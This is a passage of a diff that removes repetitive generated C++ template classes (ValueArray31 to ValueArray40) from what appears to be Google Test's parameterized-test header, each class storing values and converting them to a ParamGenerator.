-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray31& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-class ValueArray32 {
- public:
-  ValueArray32(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27),
-      v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray32& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-class ValueArray33 {
- public:
-  ValueArray33(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32,
-      T33 v33) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray33& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-class ValueArray34 {
- public:
-  ValueArray34(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray34& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-class ValueArray35 {
- public:
-  ValueArray35(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19),
-      v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25),
-      v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31),
-      v32_(v32), v33_(v33), v34_(v34), v35_(v35) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray35& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-class ValueArray36 {
- public:
-  ValueArray36(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24),
-      v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30),
-      v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35), v36_(v36) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray36& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-class ValueArray37 {
- public:
-  ValueArray37(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23),
-      v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29),
-      v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35),
-      v36_(v36), v37_(v37) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray37& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-class ValueArray38 {
- public:
-  ValueArray38(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray38& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-class ValueArray39 {
- public:
-  ValueArray39(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray39& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-class ValueArray40 {
- public:
-  ValueArray40(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27),
-      v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33),
-      v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39),
-      v40_(v40) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
